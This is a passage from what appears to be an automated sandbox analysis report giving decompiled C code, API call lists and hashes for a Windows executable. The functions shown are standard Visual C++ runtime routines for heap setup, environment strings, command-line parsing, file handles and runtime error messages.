                                                                    				_t57 = 0;
                                                                    				while(_t45 >= 0) {
                                                                    					_t45 = _t45 << 1;
                                                                    					_t57 = _t57 + 1;
                                                                    				}
                                                                    				_t69 = 0x3f;
                                                                    				_t48 = _t57 * 0x204 + _t81 + 0x144;
                                                                    				_v8 = _t48;
                                                                    				do {
                                                                    					 *((intOrPtr*)(_t48 + 8)) = _t48;
                                                                    					 *((intOrPtr*)(_t48 + 4)) = _t48;
                                                                    					_t48 = _t48 + 8;
                                                                    					_t69 = _t69 - 1;
                                                                    				} while (_t69 != 0);
                                                                    				_t77 = (_t57 << 0xf) +  *((intOrPtr*)(_t60 + 0xc));
                                                                    				_t49 = VirtualAlloc(_t77, 0x8000, 0x1000, 4); // executed
                                                                    				if(_t49 != 0) {
                                                                    					_t70 = _t77 + 0x7000;
                                                                    					if(_t77 <= _t70) {
                                                                    						_t55 = _t77 + 0x10;
                                                                    						do {
                                                                    							 *(_t55 - 8) =  *(_t55 - 8) | 0xffffffff;
                                                                    							 *(_t55 + 0xfec) =  *(_t55 + 0xfec) | 0xffffffff;
                                                                    							 *((intOrPtr*)(_t55 - 4)) = 0xff0;
                                                                    							 *_t55 = _t55 + 0xffc;
                                                                    							 *((intOrPtr*)(_t55 + 4)) = _t55 - 0x1004;
                                                                    							 *((intOrPtr*)(_t55 + 0xfe8)) = 0xff0;
                                                                    							_t55 = _t55 + 0x1000;
                                                                    						} while (_t55 - 0x10 <= _t70);
                                                                    					}
                                                                    					_t61 = _t77 + 0xc;
                                                                    					_t51 = _v8 + 0x1f8;
                                                                    					_t78 = 1;
                                                                    					 *((intOrPtr*)(_t51 + 4)) = _t61;
                                                                    					 *((intOrPtr*)(_t61 + 8)) = _t51;
                                                                    					_t62 = _t70 + 0xc;
                                                                    					 *((intOrPtr*)(_t51 + 8)) = _t62;
                                                                    					 *((intOrPtr*)(_t62 + 4)) = _t51;
                                                                    					 *(_t81 + 0x44 + _t57 * 4) =  *(_t81 + 0x44 + _t57 * 4) & 0x00000000;
                                                                    					 *(_t81 + 0xc4 + _t57 * 4) = _t78;
                                                                    					_t52 =  *((intOrPtr*)(_t81 + 0x43));
                                                                    					_t53 = _a4;
                                                                    					 *((char*)(_t81 + 0x43)) = _t52 + 1;
                                                                    					if(_t52 == 0) {
                                                                    						 *(_t53 + 4) =  *(_t53 + 4) | _t78;
                                                                    					}
                                                                    					 *(_t53 + 8) =  *(_t53 + 8) &  !(0x80000000 >> _t57);
                                                                    					_t54 = _t57;
                                                                    				} else {
                                                                    					_t54 = _t49 | 0xffffffff;
                                                                    				}
                                                                    				return _t54;
                                                                    			}

                                                                    APIs
                                                                    • VirtualAlloc.KERNELBASE(?,00008000,00001000,00000004,00000000,00000000,000000E0,?,?,00403A06,000000E0,00000000,?,?,?,004020CA), ref: 00403D31
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.340723744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.340717496.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.340734243.0000000000405000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.340741211.0000000000406000.00000004.00020000.sdmp
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 9d438d4134b86c2efbcaf3945f0259036a402dc27640de80926b667abbbceb32
                                                                    • Instruction ID: 1ee4e415234a1565e3cd0130980f47cc70c62d64d7dcf553b1e67335dfe42ba5
                                                                    • Opcode Fuzzy Hash: 9d438d4134b86c2efbcaf3945f0259036a402dc27640de80926b667abbbceb32
                                                                    • Instruction Fuzzy Hash: EB318B316006029FD314CF18C484BA6BBE4FF50365F2482BEE5598B2E1D774EA46CB44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 73%
                                                                    			E00403505(signed int _a4, signed int _a8) {
                                                                    				void* _t8;
                                                                    				long _t11;
                                                                    				void* _t13;
                                                                    				long _t15;
                                                                    				void* _t17;
                                                                    				void* _t23;
                                                                    
                                                                    				_t15 = _a4 * _a8;
                                                                    				_t11 = _t15;
                                                                    				if(_t15 <= 0xffffffe0) {
                                                                    					if(_t15 == 0) {
                                                                    						_t15 = 1;
                                                                    					}
                                                                    					_t15 = _t15 + 0x0000000f & 0xfffffff0;
                                                                    				}
                                                                    				while(1) {
                                                                    					_t13 = 0;
                                                                    					if(_t15 > 0xffffffe0) {
                                                                    						goto L8;
                                                                    					}
                                                                    					_t23 = _t11 -  *0x406240; // 0x3f8
                                                                    					if(_t23 > 0) {
                                                                    						L7:
                                                                    						_t13 = HeapAlloc( *0x406574, 8, _t15);
                                                                    						if(_t13 != 0) {
                                                                    							L12:
                                                                    							return _t13;
                                                                    						}
                                                                    						goto L8;
                                                                    					}
                                                                    					E00402FC1(9);
                                                                    					_push(_t11); // executed
                                                                    					_t8 = E00403926(); // executed
                                                                    					_t13 = _t8;
                                                                    					E00403022(9);
                                                                    					_t17 = _t17 + 0xc;
                                                                    					if(_t13 != 0) {
                                                                    						E00404080(_t13, 0, _t11);
                                                                    						goto L12;
                                                                    					}
                                                                    					goto L7;
                                                                    					L8:
                                                                    					if( *0x406554 == 0) {
                                                                    						goto L12;
                                                                    					}
                                                                    					if(E0040405E(_t15) == 0) {
                                                                    						return 0;
                                                                    					}
                                                                    				}
                                                                    			}










                                                                    APIs
                                                                    • HeapAlloc.KERNEL32(00000008,?,?,?,?,00402B51,00000001,00000074,?,004020CA), ref: 0040355A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.340723744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.340717496.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.340734243.0000000000405000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.340741211.0000000000406000.00000004.00020000.sdmp
                                                                    Similarity
                                                                    • API ID: AllocHeap
                                                                    • String ID:
                                                                    • API String ID: 4292702814-0
                                                                    • Opcode ID: 96033c71a81d4bc925899e7ece1dd47c7d7021f592189cdb1f5a8d91f65cd873
                                                                    • Instruction ID: 610f0df8e04b7164b0698d1f2c5a8b57cbc10cfea3193bb00eb9ec1fd8239ef0
                                                                    • Opcode Fuzzy Hash: 96033c71a81d4bc925899e7ece1dd47c7d7021f592189cdb1f5a8d91f65cd873
                                                                    • Instruction Fuzzy Hash: E101F5729016203AD5217F296D41B5B2A1CDBC17A6F16063BFE54772E2E6788F0041AD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    C-Code - Quality: 46%
                                                                    			E00403DDB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                    				intOrPtr* _t4;
                                                                    				intOrPtr* _t7;
                                                                    				_Unknown_base(*)()* _t11;
                                                                    				void* _t14;
                                                                    				struct HINSTANCE__* _t15;
                                                                    				void* _t17;
                                                                    
                                                                    				_t14 = 0;
                                                                    				_t17 =  *0x406548 - _t14; // 0x0
                                                                    				if(_t17 != 0) {
                                                                    					L4:
                                                                    					_t4 =  *0x40654c; // 0x0
                                                                    					if(_t4 != 0) {
                                                                    						_t14 =  *_t4();
                                                                    						if(_t14 != 0) {
                                                                    							_t7 =  *0x406550; // 0x0
                                                                    							if(_t7 != 0) {
                                                                    								_t14 =  *_t7(_t14);
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					return  *0x406548(_t14, _a4, _a8, _a12);
                                                                    				}
                                                                    				_t15 = LoadLibraryA("user32.dll");
                                                                    				if(_t15 == 0) {
                                                                    					L10:
                                                                    					return 0;
                                                                    				}
                                                                    				_t11 = GetProcAddress(_t15, "MessageBoxA");
                                                                    				 *0x406548 = _t11;
                                                                    				if(_t11 == 0) {
                                                                    					goto L10;
                                                                    				} else {
                                                                    					 *0x40654c = GetProcAddress(_t15, "GetActiveWindow");
                                                                    					 *0x406550 = GetProcAddress(_t15, "GetLastActivePopup");
                                                                    					goto L4;
                                                                    				}
                                                                    			}










                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00402F69,?,Microsoft Visual C++ Runtime Library,00012010,?,00405368,?,004053B8,?,?,?,Runtime Error!Program: ), ref: 00403DED
                                                                    • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00403E05
                                                                    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00403E16
                                                                    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00403E23
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.340723744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.340717496.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.340734243.0000000000405000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.340741211.0000000000406000.00000004.00020000.sdmp
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryLoad
                                                                    • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                    • API String ID: 2238633743-4044615076
                                                                    • Opcode ID: 483b65111520c63d727d1228dc1df21d4e2283ef0b4d4ef92e8523a719d25699
                                                                    • Instruction ID: f79bfe25e058f3eb4303112d28ba12920f0060c447442e98a4e600f14fe53912
                                                                    • Opcode Fuzzy Hash: 483b65111520c63d727d1228dc1df21d4e2283ef0b4d4ef92e8523a719d25699
                                                                    • Instruction Fuzzy Hash: B7017531600621ABC7109FB5ED84A5B3EDDEB88796311043BB501F2291D778C9518FA8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%


                                                                    C-Code - Quality: 100%
                                                                    			E00402768() {
                                                                    				int _t13;
                                                                    				WCHAR* _t22;
                                                                    				void* _t24;
                                                                    				signed int _t25;
                                                                    				WCHAR* _t27;
                                                                    				void* _t28;
                                                                    				WCHAR* _t30;
                                                                    				short* _t44;
                                                                    				char* _t56;
                                                                    				short* _t57;
                                                                    				void* _t58;
                                                                    				WCHAR* _t59;
                                                                    				void* _t60;
                                                                    				char* _t62;
                                                                    				void* _t63;
                                                                    
                                                                    				_t13 =  *0x4064b8; // 0x1
                                                                    				_t59 = 0;
                                                                    				_t60 = 0;
                                                                    				if(_t13 != 0) {
                                                                    					__eflags = _t13 - 1;
                                                                    					if(_t13 != 1) {
                                                                    						__eflags = _t13 - 2;
                                                                    						if(_t13 != 2) {
                                                                    							L22:
                                                                    							__eflags = 0;
                                                                    							return 0;
                                                                    						}
                                                                    						L15:
                                                                    						__eflags = _t59;
                                                                    						if(_t59 != 0) {
                                                                    							L17:
                                                                    							__eflags =  *_t59;
                                                                    							_t56 = _t59;
                                                                    							if( *_t59 == 0) {
                                                                    								L20:
                                                                    								_t61 = _t60 + 1;
                                                                    								 *((intOrPtr*)(_t63 + 0x10)) = _t60 + 1;
                                                                    								_t44 = E004030A4(_t61 + _t61);
                                                                    								__eflags = _t44;
                                                                    								if(_t44 != 0) {
                                                                    									__eflags =  *_t59;
                                                                    									_t62 = _t59;
                                                                    									_t57 = _t44;
                                                                    									if( *_t59 == 0) {
                                                                    										L27:
                                                                    										 *_t57 =  *_t57 & 0x00000000;
                                                                    										L29:
                                                                    										FreeEnvironmentStringsA(_t59);
                                                                    										return _t44;
                                                                    									} else {
                                                                    										goto L25;
                                                                    									}
                                                                    									while(1) {
                                                                    										L25:
                                                                    										_t7 = _t63 + 0x10; // 0x4020ef
                                                                    										_t22 = MultiByteToWideChar( *0x406540, 1, _t62, 0xffffffff, _t57,  *_t7 - (_t57 - _t44 >> 1));
                                                                    										__eflags = _t22;
                                                                    										if(_t22 == 0) {
                                                                    											break;
                                                                    										}
                                                                    										_t24 = E00403150(_t62);
                                                                    										_t9 =  &(_t62[1]); // 0x1
                                                                    										_t62 = _t24 + _t9;
                                                                    										_t25 = E00403130(_t57);
                                                                    										__eflags =  *_t62;
                                                                    										_t57 = _t57 + 2 + _t25 * 2;
                                                                    										if( *_t62 != 0) {
                                                                    											continue;
                                                                    										}
                                                                    										goto L27;
                                                                    									}
                                                                    									E00403037(_t44);
                                                                    									_t44 = 0;
                                                                    									__eflags = 0;
                                                                    									goto L29;
                                                                    								}
                                                                    								FreeEnvironmentStringsA(_t59);
                                                                    								goto L22;
                                                                    							} else {
                                                                    								goto L18;
                                                                    							}
                                                                    							while(1) {
                                                                    								L18:
                                                                    								_t27 = MultiByteToWideChar( *0x406540, 1, _t56, 0xffffffff, 0, 0);
                                                                    								__eflags = _t27;
                                                                    								if(_t27 == 0) {
                                                                    									goto L22;
                                                                    								}
                                                                    								_t60 = _t60 + _t27;
                                                                    								_t28 = E00403150(_t56);
                                                                    								__eflags = _t56[_t28 + 1];
                                                                    								_t56 =  &(_t56[_t28 + 1]);
                                                                    								if(__eflags != 0) {
                                                                    									continue;
                                                                    								}
                                                                    								goto L20;
                                                                    							}
                                                                    							goto L22;
                                                                    						}
                                                                    						_t59 = GetEnvironmentStrings();
                                                                    						__eflags = _t59;
                                                                    						if(_t59 == 0) {
                                                                    							goto L22;
                                                                    						}
                                                                    						goto L17;
                                                                    					}
                                                                    					L6:
                                                                    					if(_t59 != 0) {
                                                                    						L8:
                                                                    						_t30 = _t59;
                                                                    						if( *_t59 == 0) {
                                                                    							L11:
                                                                    							_t45 = _t30 - _t59 + 2;
                                                                    							_t58 = E004030A4(_t30 - _t59 + 2);
                                                                    							if(_t58 != 0) {
                                                                    								E004031D0(_t58, _t59, _t45);
                                                                    							}
                                                                    							FreeEnvironmentStringsW(_t59);
                                                                    							return _t58;
                                                                    						} else {
                                                                    							goto L9;
                                                                    						}
                                                                    						do {
                                                                    							do {
                                                                    								L9:
                                                                    								_t30 =  &(_t30[1]);
                                                                    							} while ( *_t30 != 0);
                                                                    							_t30 =  &(_t30[1]);
                                                                    						} while ( *_t30 != 0);
                                                                    						goto L11;
                                                                    					}
                                                                    					_t59 = GetEnvironmentStringsW();
                                                                    					if(_t59 == 0) {
                                                                    						goto L22;
                                                                    					}
                                                                    					goto L8;
                                                                    				}
                                                                    				_t59 = GetEnvironmentStringsW();
                                                                    				if(_t59 == 0) {
                                                                    					_t59 = GetEnvironmentStrings();
                                                                    					__eflags = _t59;
                                                                    					if(_t59 == 0) {
                                                                    						goto L22;
                                                                    					}
                                                                    					 *0x4064b8 = 2;
                                                                    					goto L15;
                                                                    				}
                                                                    				 *0x4064b8 = 1;
                                                                    				goto L6;
                                                                    			}

                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,004020EF), ref: 00402786
                                                                    • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,004020EF), ref: 0040279A
                                                                    • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,004020EF), ref: 004027BB
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004027F2
                                                                    • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,004020EF), ref: 00402812
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,00000000,?,00000000,?,?,?,004020EF), ref: 00402830
                                                                    • FreeEnvironmentStringsA.KERNEL32(00000000,?,00000000,?,?,?,004020EF), ref: 00402865
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000, @,?,00000000,?,?,?,004020EF), ref: 00402895
                                                                    • FreeEnvironmentStringsA.KERNEL32(00000000,?,00000000,?,?,?,004020EF), ref: 004028CB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.340723744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.340717496.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.340734243.0000000000405000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.340741211.0000000000406000.00000004.00020000.sdmp
                                                                    Similarity
                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                    • String ID: @
                                                                    • API String ID: 158306478-124383662
                                                                    • Opcode ID: 742fff747372ddc5f5a4a31ec3bb5f6c55053eaba9baf2373a24781a052e9306
                                                                    • Instruction ID: 8c9ac7f65b5f2ccc2fcf31fe3e13e0e4d651834e3feb9d7db9463b6a46bc41e0
                                                                    • Opcode Fuzzy Hash: 742fff747372ddc5f5a4a31ec3bb5f6c55053eaba9baf2373a24781a052e9306
                                                                    • Instruction Fuzzy Hash: 064123365046116BDB217F759E4CB2B769CEB05718F25463BE802F73C0DAF88D4082AC
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 96%
                                                                    			E00402E45(void* __edi, long _a4) {
                                                                    				char _v164;
                                                                    				char _v424;
                                                                    				int _t17;
                                                                    				long _t19;
                                                                    				signed int _t42;
                                                                    				long _t47;
                                                                    				void* _t48;
                                                                    				signed int _t54;
                                                                    				void** _t56;
                                                                    				void* _t57;
                                                                    
                                                                    				_t48 = __edi;
                                                                    				_t47 = _a4;
                                                                    				_t42 = 0;
                                                                    				_t17 = 0x4060f0;
                                                                    				while(_t47 !=  *_t17) {
                                                                    					_t17 = _t17 + 8;
                                                                    					_t42 = _t42 + 1;
                                                                    					if(_t17 < 0x406180) {
                                                                    						continue;
                                                                    					}
                                                                    					break;
                                                                    				}
                                                                    				_t54 = _t42 << 3;
                                                                    				_t2 = _t54 + 0x4060f0; // 0x68000000
                                                                    				if(_t47 ==  *_t2) {
                                                                    					_t17 =  *0x406268; // 0x0
                                                                    					if(_t17 == 1 || _t17 == 0 &&  *0x406024 == 1) {
                                                                    						_t16 = _t54 + 0x4060f4; // 0x405368
                                                                    						_t56 = _t16;
                                                                    						_t19 = E00403150( *_t56);
                                                                    						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
                                                                    					} else {
                                                                    						if(_t47 != 0xfc) {
                                                                    							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
                                                                    								E00403E70( &_v424, "<program name unknown>");
                                                                    							}
                                                                    							_push(_t48);
                                                                    							_t49 =  &_v424;
                                                                    							if(E00403150( &_v424) + 1 > 0x3c) {
                                                                    								_t49 = E00403150( &_v424) +  &_v424 - 0x3b;
                                                                    								E00403F60(E00403150( &_v424) +  &_v424 - 0x3b, "...", 3);
                                                                    								_t57 = _t57 + 0x10;
                                                                    							}
                                                                    							E00403E70( &_v164, "Runtime Error!\n\nProgram: ");
                                                                    							E00403E80( &_v164, _t49);
                                                                    							E00403E80( &_v164, "\n\n");
                                                                    							_t12 = _t54 + 0x4060f4; // 0x405368
                                                                    							E00403E80( &_v164,  *_t12);
                                                                    							_t17 = E00403DDB( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				return _t17;
                                                                    			}

                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 00402EB2
                                                                    • GetStdHandle.KERNEL32(000000F4,00405368,00000000,?,00000000,?), ref: 00402F88
                                                                    • WriteFile.KERNEL32(00000000), ref: 00402F8F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.340723744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.340717496.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.340734243.0000000000405000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.340741211.0000000000406000.00000004.00020000.sdmp
                                                                    Similarity
                                                                    • API ID: File$HandleModuleNameWrite
                                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                    • API String ID: 3784150691-4022980321
                                                                    • Opcode ID: 88fbfeb4c1d95fa6dc04fbcf8a8cb29eda3272d94df6b0c60894d36e6c1c876f
                                                                    • Instruction ID: 34a32bd733e87856778307dd540b43557dc55c4e69cc7722e37ab36410eb5d04
                                                                    • Opcode Fuzzy Hash: 88fbfeb4c1d95fa6dc04fbcf8a8cb29eda3272d94df6b0c60894d36e6c1c876f
                                                                    • Instruction Fuzzy Hash: E531F632A40219AEDF20EB60CD49F9B777CDF49344F10017BF945F61C1E6B89A448A59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E004028D5() {
                                                                    				int _t2;
                                                                    				char* _t14;
                                                                    				int _t20;
                                                                    				short* _t21;
                                                                    
                                                                    				_t2 =  *0x4064bc; // 0x1
                                                                    				if(_t2 != 0) {
                                                                    					if(_t2 != 1) {
                                                                    						if(_t2 != 2) {
                                                                    							L12:
                                                                    							return 0;
                                                                    						}
                                                                    						L8:
                                                                    						_t14 = GetCommandLineA();
                                                                    						_t20 = MultiByteToWideChar( *0x406540, 1, _t14, 0xffffffff, 0, 0);
                                                                    						if(_t20 == 0) {
                                                                    							goto L12;
                                                                    						}
                                                                    						_t21 = E004030A4(_t20 + _t20);
                                                                    						if(_t21 == 0) {
                                                                    							goto L12;
                                                                    						}
                                                                    						if(MultiByteToWideChar( *0x406540, 1, _t14, 0xffffffff, _t21, _t20) != 0) {
                                                                    							return _t21;
                                                                    						}
                                                                    						E00403037(_t21);
                                                                    						goto L12;
                                                                    					}
                                                                    					L6:
                                                                    					return GetCommandLineW();
                                                                    				}
                                                                    				if(GetCommandLineW() == 0) {
                                                                    					if(GetCommandLineA() == 0) {
                                                                    						goto L12;
                                                                    					}
                                                                    					 *0x4064bc = 2;
                                                                    					goto L8;
                                                                    				}
                                                                    				 *0x4064bc = 1;
                                                                    				goto L6;
                                                                    			}

                                                                    APIs
                                                                    • GetCommandLineW.KERNEL32(?,00000000,?,?,004020E5), ref: 004028EE
                                                                    • GetCommandLineA.KERNEL32(?,00000000,?,?,004020E5), ref: 00402900
                                                                    • GetCommandLineW.KERNEL32(?,00000000,?,?,004020E5), ref: 00402917
                                                                    • GetCommandLineA.KERNEL32(?,00000000,?,?,004020E5), ref: 00402920
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,00000000,?,00000000,?,?,004020E5), ref: 00402939
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,00000000,?,00000000,?,?,004020E5), ref: 0040295E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.340723744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.340717496.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.340734243.0000000000405000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.340741211.0000000000406000.00000004.00020000.sdmp
                                                                    Similarity
                                                                    • API ID: CommandLine$ByteCharMultiWide
                                                                    • String ID:
                                                                    • API String ID: 3068183746-0
                                                                    • Opcode ID: 30f9c07578f9d2d220889b88a4d149df62fb71d6f182f412a7c863525801d0a9
                                                                    • Instruction ID: f58d0bc1937a138f834de6328cb86a39617e63097a262e2bbd79f293356c3b37
                                                                    • Opcode Fuzzy Hash: 30f9c07578f9d2d220889b88a4d149df62fb71d6f182f412a7c863525801d0a9
                                                                    • Instruction Fuzzy Hash: 77112BB270451966EA205776AE8CF2736CCDB40768F210137F911F22D0E6FADC004ABC
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 99%
                                                                    			E00402976() {
                                                                    				void** _v8;
                                                                    				struct _STARTUPINFOA _v76;
                                                                    				signed int* _t48;
                                                                    				signed int _t50;
                                                                    				long _t55;
                                                                    				signed int _t57;
                                                                    				signed int _t58;
                                                                    				int _t59;
                                                                    				signed char _t63;
                                                                    				signed int _t65;
                                                                    				void** _t67;
                                                                    				int _t68;
                                                                    				int _t69;
                                                                    				signed int* _t70;
                                                                    				int _t72;
                                                                    				intOrPtr* _t73;
                                                                    				signed int* _t75;
                                                                    				void* _t76;
                                                                    				void* _t84;
                                                                    				void* _t87;
                                                                    				int _t88;
                                                                    				signed int* _t89;
                                                                    				void** _t90;
                                                                    				signed int _t91;
                                                                    				int* _t92;
                                                                    
                                                                    				_t89 = E004030A4(0x480);
                                                                    				if(_t89 == 0) {
                                                                    					E00402161(0x1b);
                                                                    				}
                                                                    				 *0x406580 = _t89;
                                                                    				 *0x406680 = 0x20;
                                                                    				_t1 =  &(_t89[0x120]); // 0x480
                                                                    				_t48 = _t1;
                                                                    				while(_t89 < _t48) {
                                                                    					_t89[1] = _t89[1] & 0x00000000;
                                                                    					 *_t89 =  *_t89 | 0xffffffff;
                                                                    					_t89[2] = _t89[2] & 0x00000000;
                                                                    					_t89[1] = 0xa;
                                                                    					_t70 =  *0x406580; // 0x22648c0
                                                                    					_t89 =  &(_t89[9]);
                                                                    					_t48 =  &(_t70[0x120]);
                                                                    				}
                                                                    				GetStartupInfoA( &_v76);
                                                                    				__eflags = _v76.cbReserved2;
                                                                    				if(_v76.cbReserved2 == 0) {
                                                                    					L25:
                                                                    					_t72 = 0;
                                                                    					__eflags = 0;
                                                                    					do {
                                                                    						_t75 =  *0x406580; // 0x22648c0
                                                                    						_t50 = _t72 + _t72 * 8;
                                                                    						__eflags = _t75[_t50] - 0xffffffff;
                                                                    						_t90 =  &(_t75[_t50]);
                                                                    						if(_t75[_t50] != 0xffffffff) {
                                                                    							_t45 =  &(_t90[1]);
                                                                    							 *_t45 = _t90[1] | 0x00000080;
                                                                    							__eflags =  *_t45;
                                                                    							goto L37;
                                                                    						}
                                                                    						__eflags = _t72;
                                                                    						_t90[1] = 0x81;
                                                                    						if(_t72 != 0) {
                                                                    							asm("sbb eax, eax");
                                                                    							_t55 =  ~(_t72 - 1) + 0xfffffff5;
                                                                    							__eflags = _t55;
                                                                    						} else {
                                                                    							_t55 = 0xfffffff6;
                                                                    						}
                                                                    						_t87 = GetStdHandle(_t55);
                                                                    						__eflags = _t87 - 0xffffffff;
                                                                    						if(_t87 == 0xffffffff) {
                                                                    							L33:
                                                                    							_t90[1] = _t90[1] | 0x00000040;
                                                                    						} else {
                                                                    							_t57 = GetFileType(_t87);
                                                                    							__eflags = _t57;
                                                                    							if(_t57 == 0) {
                                                                    								goto L33;
                                                                    							}
                                                                    							_t58 = _t57 & 0x000000ff;
                                                                    							 *_t90 = _t87;
                                                                    							__eflags = _t58 - 2;
                                                                    							if(_t58 != 2) {
                                                                    								__eflags = _t58 - 3;
                                                                    								if(_t58 == 3) {
                                                                    									_t90[1] = _t90[1] | 0x00000008;
                                                                    								}
                                                                    								goto L37;
                                                                    							}
                                                                    							goto L33;
                                                                    						}
                                                                    						L37:
                                                                    						_t72 = _t72 + 1;
                                                                    						__eflags = _t72 - 3;
                                                                    					} while (_t72 < 3);
                                                                    					return SetHandleCount( *0x406680);
                                                                    				}
                                                                    				_t59 = _v76.lpReserved2;
                                                                    				__eflags = _t59;
                                                                    				if(_t59 == 0) {
                                                                    					goto L25;
                                                                    				}
                                                                    				_t88 =  *_t59;
                                                                    				_t73 = _t59 + 4;
                                                                    				_v8 = _t73 + _t88;
                                                                    				__eflags = _t88 - 0x800;
                                                                    				if(_t88 >= 0x800) {
                                                                    					_t88 = 0x800;
                                                                    				}
                                                                    				__eflags =  *0x406680 - _t88; // 0x20
                                                                    				if(__eflags >= 0) {
                                                                    					L18:
                                                                    					_t91 = 0;
                                                                    					__eflags = _t88;
                                                                    					if(_t88 <= 0) {
                                                                    						goto L25;
                                                                    					} else {
                                                                    						goto L19;
                                                                    					}
                                                                    					do {
                                                                    						L19:
                                                                    						_t76 =  *_v8;
                                                                    						__eflags = _t76 - 0xffffffff;
                                                                    						if(_t76 == 0xffffffff) {
                                                                    							goto L24;
                                                                    						}
                                                                    						_t63 =  *_t73;
                                                                    						__eflags = _t63 & 0x00000001;
                                                                    						if((_t63 & 0x00000001) == 0) {
                                                                    							goto L24;
                                                                    						}
                                                                    						__eflags = _t63 & 0x00000008;
                                                                    						if((_t63 & 0x00000008) != 0) {
                                                                    							L23:
                                                                    							_t65 = _t91 & 0x0000001f;
                                                                    							__eflags = _t65;
                                                                    							_t67 =  &(0x406580[_t91 >> 5][_t65 + _t65 * 8]);
                                                                    							 *_t67 =  *_v8;
                                                                    							_t67[1] =  *_t73;
                                                                    							goto L24;
                                                                    						}
                                                                    						_t68 = GetFileType(_t76);
                                                                    						__eflags = _t68;
                                                                    						if(_t68 == 0) {
                                                                    							goto L24;
                                                                    						}
                                                                    						goto L23;
                                                                    						L24:
                                                                    						_v8 =  &(_v8[1]);
                                                                    						_t91 = _t91 + 1;
                                                                    						_t73 = _t73 + 1;
                                                                    						__eflags = _t91 - _t88;
                                                                    					} while (_t91 < _t88);
                                                                    					goto L25;
                                                                    				} else {
                                                                    					_t92 = 0x406584;
                                                                    					while(1) {
                                                                    						_t69 = E004030A4(0x480);
                                                                    						__eflags = _t69;
                                                                    						if(_t69 == 0) {
                                                                    							break;
                                                                    						}
                                                                    						 *0x406680 =  *0x406680 + 0x20;
                                                                    						__eflags =  *0x406680;
                                                                    						 *_t92 = _t69;
                                                                    						_t13 = _t69 + 0x480; // 0x480
                                                                    						_t84 = _t13;
                                                                    						while(1) {
                                                                    							__eflags = _t69 - _t84;
                                                                    							if(_t69 >= _t84) {
                                                                    								break;
                                                                    							}
                                                                    							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
                                                                    							 *_t69 =  *_t69 | 0xffffffff;
                                                                    							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
                                                                    							 *((char*)(_t69 + 5)) = 0xa;
                                                                    							_t69 = _t69 + 0x24;
                                                                    							_t84 =  *_t92 + 0x480;
                                                                    						}
